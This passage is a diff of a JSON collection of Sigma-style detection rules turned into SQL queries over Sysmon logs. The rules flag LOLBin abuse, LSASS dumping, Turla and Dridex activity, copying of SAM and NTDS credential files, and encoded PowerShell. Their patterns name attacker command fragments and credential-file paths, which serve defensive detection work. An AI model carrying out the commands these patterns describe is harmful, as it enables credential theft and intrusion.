'%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' 
ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "description": "Detects usage of winget to install applications via manifest file. 
Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", - "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "status": "test", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying 
sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + 
"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. 
An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Legitimate administrative tasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + 
"attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", - "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "status": "test", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + 
"attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE 
'%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "status": "test", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" + }, + { + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). 
As seen used by Sarwent Malware", + "author": "Sander Wiebing", + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + }, + { + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Obfuscated IP Via CLI", - 
"id": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "description": "Detects usage of wmic to start or stop a service", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + 
"attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "PsExec 
Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine 
